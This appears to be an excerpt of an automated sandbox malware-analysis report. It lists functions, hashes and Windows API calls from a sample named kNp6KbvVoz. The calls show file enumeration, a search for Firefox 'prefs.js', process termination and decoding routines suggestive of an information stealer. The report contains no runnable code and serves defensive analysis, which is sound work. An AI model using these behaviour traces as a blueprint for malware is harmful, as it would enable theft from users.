                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                      • API String ID: 0-1562099544
                                      • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                      • Instruction ID: 1e798cb210156cca2629da4fed63cb19a855f135ed650e124bdfb70324ba2320
                                      • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                      • Instruction Fuzzy Hash: BEE276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                                      APIs
                                        • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                        • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                        • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                        • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                        • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C32), ref: 0040DF5E
                                      • StrCmpCA.SHLWAPI(?,004215C0), ref: 0040DFAE
                                      • StrCmpCA.SHLWAPI(?,004215C4), ref: 0040DFC4
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E4E0
                                      • FindClose.KERNEL32(000000FF), ref: 0040E4F2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                      • String ID: 4@$\*.*
                                      • API String ID: 2325840235-1993203227
                                      • Opcode ID: 3cdc3bc1ca4623dd4ab3a98770b64da100480c73e045b6562c069503d68560b6
                                      • Instruction ID: 5b1d21d8256b1a4f75019a03d5e94b0e3f490a8b44af3c5bb40891ece502d815
                                      • Opcode Fuzzy Hash: 3cdc3bc1ca4623dd4ab3a98770b64da100480c73e045b6562c069503d68560b6
                                      • Instruction Fuzzy Hash: F6F14D71A151189ACB25EB61DCA5EEE7339AF14314F4005EFB10A62091EF387BD8CF5A
                                      APIs
                                        • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                        • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                        • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                        • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                        • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                        • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                        • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004216B0,00420D97), ref: 0040F81E
                                      • StrCmpCA.SHLWAPI(?,004216B4), ref: 0040F86F
                                      • StrCmpCA.SHLWAPI(?,004216B8), ref: 0040F885
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0040FBB1
                                      • FindClose.KERNEL32(000000FF), ref: 0040FBC3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID: prefs.js
                                      • API String ID: 3334442632-3783873740
                                      • Opcode ID: fa97d7417b00e0ed7db09385c6ddcfeec11e37439937ba94b1fa1e1cdc91277e
                                      • Instruction ID: 41002e5bbb8aa5eaa1de2a73ae7baa64e6dc855d43d68c47d205a656f8df75cd
                                      • Opcode Fuzzy Hash: fa97d7417b00e0ed7db09385c6ddcfeec11e37439937ba94b1fa1e1cdc91277e
                                      • Instruction Fuzzy Hash: 84B19371A011089BCB24FF61DC96FEE7379AF54304F0045AEA50A57191EF386B98CF9A
                                      APIs
                                        • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042523C,?,00401F6C,?,004252E4,?,?,00000000,?,00000000), ref: 00401963
                                      • StrCmpCA.SHLWAPI(?,0042538C), ref: 004019B3
                                      • StrCmpCA.SHLWAPI(?,00425434), ref: 004019C9
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D80
                                      • DeleteFileA.KERNEL32(00000000), ref: 00401E0A
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00401E60
                                      • FindClose.KERNEL32(000000FF), ref: 00401E72
                                        • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                        • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                        • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                        • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                        • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                        • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                      • String ID: \*.*
                                      • API String ID: 1415058207-1173974218
                                      • Opcode ID: 9549c30126817f326a863de8f6b845c9f620a8f883f83f76820f6c7fe28d42c5
                                      • Instruction ID: df326988fd69e0da1611ef2be43153edb0d5c51867ec3eea105421fd5dfb977f
                                      • Opcode Fuzzy Hash: 9549c30126817f326a863de8f6b845c9f620a8f883f83f76820f6c7fe28d42c5
                                      • Instruction Fuzzy Hash: F5125171A111189BCB15FB61DCA6EEE7339AF14314F4045EEB10662091EF386BD8CFA9
                                      APIs
                                      • wsprintfA.USER32 ref: 048CF0A5
                                      • FindFirstFileA.KERNEL32(?,?), ref: 048CF0BC
                                      • StrCmpCA.SHLWAPI(?,00421630), ref: 048CF112
                                      • StrCmpCA.SHLWAPI(?,00421634), ref: 048CF128
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 048CF615
                                      • FindClose.KERNEL32(000000FF), ref: 048CF62A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID:
                                      • API String ID: 180737720-0
                                      • Opcode ID: 922fd519c71b6af3ccb31eb3f6638551c52bf54377e7cc35e7fa9b6b37ebfbe3
                                      • Instruction ID: 9cc7d49cbb95c322ad566ea4900bb253127177a1700bf7afe5d4f5599dd4cc3e
                                      • Opcode Fuzzy Hash: 922fd519c71b6af3ccb31eb3f6638551c52bf54377e7cc35e7fa9b6b37ebfbe3
                                      • Instruction Fuzzy Hash: BDE1E1719022285AEB5CFB64DC50EEE7338AF54205F504AE9A50BE2091EFB07F89CF51
                                      APIs
                                        • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                        • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                        • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                        • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                        • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                        • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                        • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215A8,00420BAF), ref: 0040DBEB
                                      • StrCmpCA.SHLWAPI(?,004215AC), ref: 0040DC33
                                      • StrCmpCA.SHLWAPI(?,004215B0), ref: 0040DC49
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DECC
                                      • FindClose.KERNEL32(000000FF), ref: 0040DEDE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID:
                                      • API String ID: 3334442632-0
                                      • Opcode ID: 62dd4eb8aaf485a9b3b424bef752cb1b9e720914b8e7beaa3b58e856919e7599
                                      • Instruction ID: c85deeef17d72a94dc1f170446f25d55197e78b42259dde6f56d7dfc7a2e5770
                                      • Opcode Fuzzy Hash: 62dd4eb8aaf485a9b3b424bef752cb1b9e720914b8e7beaa3b58e856919e7599
                                      • Instruction Fuzzy Hash: 40917572A001049BCB14FBB1ED96DED733DAF84344F00456EF90666185EE38AB5CCB9A
                                      APIs
                                        • Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF
                                        • Part of subcall function 048DAE97: lstrcpy.KERNEL32(00000000,?), ref: 048DAEE9
                                        • Part of subcall function 048DAE97: lstrcat.KERNEL32(00000000), ref: 048DAEF9
                                        • Part of subcall function 048DAF27: lstrlen.KERNEL32(?,006D6BF0,?,004250DC,00420E1A), ref: 048DAF3C
                                        • Part of subcall function 048DAF27: lstrcpy.KERNEL32(00000000), ref: 048DAF7B
                                        • Part of subcall function 048DAF27: lstrcat.KERNEL32(00000000,00000000), ref: 048DAF89
                                        • Part of subcall function 048DAE17: lstrcpy.KERNEL32(?,00420E1A), ref: 048DAE7C
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215A8,00420BAF), ref: 048CDE52
                                      • StrCmpCA.SHLWAPI(?,004215AC), ref: 048CDE9A
                                      • StrCmpCA.SHLWAPI(?,004215B0), ref: 048CDEB0
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 048CE133
                                      • FindClose.KERNEL32(000000FF), ref: 048CE145
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID:
                                      • API String ID: 3334442632-0
                                      • Opcode ID: 9542da5adebdb47cc6cff0dfe2dad098e23cc50c49b1f7ea439975f769b5948d
                                      • Instruction ID: 81af8d8912080787048ef9f87fc4a4a330e291610c5cb9ba9cc967dcfb983dbd
                                      • Opcode Fuzzy Hash: 9542da5adebdb47cc6cff0dfe2dad098e23cc50c49b1f7ea439975f769b5948d
                                      • Instruction Fuzzy Hash: 6E914472A0110897DB18FBB8EC55DED7379AF94205F104B6DA847D6150EFB4FB088B92
                                      APIs
                                        • Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF
                                        • Part of subcall function 048DAE97: lstrcpy.KERNEL32(00000000,?), ref: 048DAEE9
                                        • Part of subcall function 048DAE97: lstrcat.KERNEL32(00000000), ref: 048DAEF9
                                        • Part of subcall function 048DAF27: lstrlen.KERNEL32(?,006D6BF0,?,004250DC,00420E1A), ref: 048DAF3C
                                        • Part of subcall function 048DAF27: lstrcpy.KERNEL32(00000000), ref: 048DAF7B
                                        • Part of subcall function 048DAF27: lstrcat.KERNEL32(00000000,00000000), ref: 048DAF89
                                        • Part of subcall function 048DAE17: lstrcpy.KERNEL32(?,00420E1A), ref: 048DAE7C
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004216B0,00420D97), ref: 048CFA85
                                      • StrCmpCA.SHLWAPI(?,004216B4), ref: 048CFAD6
                                      • StrCmpCA.SHLWAPI(?,004216B8), ref: 048CFAEC
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 048CFE18
                                      • FindClose.KERNEL32(000000FF), ref: 048CFE2A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID:
                                      • API String ID: 3334442632-0
                                      • Opcode ID: 20d2439061f2986c118ea83818572df10c4fe56ef9868c5e75f33f4f1b478f52
                                      • Instruction ID: a690c1ea6ed57f39c5d25ca4b4a9833549e77926da035f0285b24893ef4709fc
                                      • Opcode Fuzzy Hash: 20d2439061f2986c118ea83818572df10c4fe56ef9868c5e75f33f4f1b478f52
                                      • Instruction Fuzzy Hash: ECB13171A012189BEB28FF64DC94EED7375AF54304F504AAD950AD6190EFB0BB48CF92
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00419905
                                      • Process32First.KERNEL32(00409FDE,00000128), ref: 00419919
                                      • Process32Next.KERNEL32(00409FDE,00000128), ref: 0041992E
                                      • StrCmpCA.SHLWAPI(?,00409FDE), ref: 00419943
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0041995C
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 0041997A
                                      • CloseHandle.KERNEL32(00000000), ref: 00419987
                                      • CloseHandle.KERNEL32(00409FDE), ref: 00419993
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                      • String ID:
                                      • API String ID: 2696918072-0
                                      • Opcode ID: 70d4dbc2df0c449e42b531910b7457683d7e33f1b1efd4492f1c83a3618bacdf
                                      • Instruction ID: 9e175830caf9148bd7a219e001ec971bef60eefc02138b6d75eb658f8e5d4480
                                      • Opcode Fuzzy Hash: 70d4dbc2df0c449e42b531910b7457683d7e33f1b1efd4492f1c83a3618bacdf
                                      • Instruction Fuzzy Hash: 94112EB5E15218ABCB24DFA0DC48BDEB7B9BB48700F00558DF509A6240EB749B84CF91
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 048D9B6C
                                      • Process32First.KERNEL32(048CA245,00000128), ref: 048D9B80
                                      • Process32Next.KERNEL32(048CA245,00000128), ref: 048D9B95
                                      • StrCmpCA.SHLWAPI(?,048CA245), ref: 048D9BAA
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 048D9BC3
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 048D9BE1
                                      • CloseHandle.KERNEL32(00000000), ref: 048D9BEE
                                      • CloseHandle.KERNEL32(048CA245), ref: 048D9BFA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                      • String ID:
                                      • API String ID: 2696918072-0
                                      • Opcode ID: 70d4dbc2df0c449e42b531910b7457683d7e33f1b1efd4492f1c83a3618bacdf
                                      • Instruction ID: 1e71b61daa7452593c83f103987deca58309400eecb1ee75bb4c690021dbf26a
                                      • Opcode Fuzzy Hash: 70d4dbc2df0c449e42b531910b7457683d7e33f1b1efd4492f1c83a3618bacdf
                                      • Instruction Fuzzy Hash: 3B111FB5E05218EBCB24DFA5DC88BDE7779AF48700F008689F505A6240EB34AB44CF51
                                      APIs
                                        • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                        • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                        • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                        • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                        • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                        • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                        • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420D79), ref: 0040E5A2
                                      • StrCmpCA.SHLWAPI(?,004215F0), ref: 0040E5F2
                                      • StrCmpCA.SHLWAPI(?,004215F4), ref: 0040E608
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0040ECDF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                      • String ID: \*.*$@
                                      • API String ID: 433455689-2355794846
                                      • Opcode ID: fd4b8a02529220b5ed0f2464db00e78548197825fe913ecccb08edd01f2acd1a
                                      • Instruction ID: 078a0cb4b8b1302ba7a9d85fb6124db0b21cd0ebb254cebb7c4a92464ee22dab
                                      • Opcode Fuzzy Hash: fd4b8a02529220b5ed0f2464db00e78548197825fe913ecccb08edd01f2acd1a
                                      • Instruction Fuzzy Hash: A6128431A111185BCB14FB61DCA6EED7339AF54314F4045EFB10A62095EF386F98CB9A
                                      APIs
                                        • Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042523C,?,?,?,004252E4,?,?,00000000,?,00000000), ref: 048C1BCA
                                      • StrCmpCA.SHLWAPI(?,0042538C), ref: 048C1C1A
                                      • StrCmpCA.SHLWAPI(?,00425434), ref: 048C1C30
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 048C1FE7
                                      • DeleteFileA.KERNEL32(00000000), ref: 048C2071
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 048C20C7
                                      • FindClose.KERNEL32(000000FF), ref: 048C20D9
                                        • Part of subcall function 048DAE97: lstrcpy.KERNEL32(00000000,?), ref: 048DAEE9
                                        • Part of subcall function 048DAE97: lstrcat.KERNEL32(00000000), ref: 048DAEF9
                                        • Part of subcall function 048DAF27: lstrlen.KERNEL32(?,006D6BF0,?,004250DC,00420E1A), ref: 048DAF3C
                                        • Part of subcall function 048DAF27: lstrcpy.KERNEL32(00000000), ref: 048DAF7B
                                        • Part of subcall function 048DAF27: lstrcat.KERNEL32(00000000,00000000), ref: 048DAF89
                                        • Part of subcall function 048DAE17: lstrcpy.KERNEL32(?,00420E1A), ref: 048DAE7C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                      • String ID:
                                      • API String ID: 1415058207-0
                                      • Opcode ID: b85232a698949c79e4680004d1e76e0f04a31e92f8088ffb748d566cac29b108
                                      • Instruction ID: 734f5f7ccc0ba01d832254769d6767b5c8ba5acef29e661a5923718a6091755d
                                      • Opcode Fuzzy Hash: b85232a698949c79e4680004d1e76e0f04a31e92f8088ffb748d566cac29b108
                                      • Instruction Fuzzy Hash: 2412CA719022189ADB1DEB64DC94EED7378AF54305F504AEDA50BE2090EFB47B88CF52
                                      APIs
                                        • Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF
                                        • Part of subcall function 048DAF27: lstrlen.KERNEL32(?,006D6BF0,?,004250DC,00420E1A), ref: 048DAF3C
                                        • Part of subcall function 048DAF27: lstrcpy.KERNEL32(00000000), ref: 048DAF7B
                                        • Part of subcall function 048DAF27: lstrcat.KERNEL32(00000000,00000000), ref: 048DAF89
                                        • Part of subcall function 048DAE17: lstrcpy.KERNEL32(?,00420E1A), ref: 048DAE7C
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,004215B8,00420C32), ref: 048CE1C5
                                      • StrCmpCA.SHLWAPI(?,004215C0), ref: 048CE215
                                      • StrCmpCA.SHLWAPI(?,004215C4), ref: 048CE22B
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 048CE747
                                      • FindClose.KERNEL32(000000FF), ref: 048CE759
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                      • String ID:
                                      • API String ID: 2325840235-0
                                      • Opcode ID: 331afb331abdd3764059b67a16730e5bc1ed144ae4cc64f7786a3dfac513c809
                                      • Instruction ID: 713a3fea9fd945a2e5623d9a41448ce2298508011ac140138908985b3c9cc96a
                                      • Opcode Fuzzy Hash: 331afb331abdd3764059b67a16730e5bc1ed144ae4cc64f7786a3dfac513c809
                                      • Instruction Fuzzy Hash: 1CF1DF719552289ADB1DEB64DC94EEE7338AF14305F904ADE944BE2090EFB07F88CE51
                                      APIs
                                      • memset.MSVCRT ref: 0040C953
                                      • lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,02EB20E0), ref: 0040C971
                                      • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C97C
                                      • memcpy.MSVCRT(?,?,?), ref: 0040CA12
                                      • lstrcatA.KERNEL32(?,00420B47), ref: 0040CA43
                                      • lstrcatA.KERNEL32(?,00420B4B), ref: 0040CA57
                                      • lstrcatA.KERNEL32(?,00420B4E), ref: 0040CA78
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
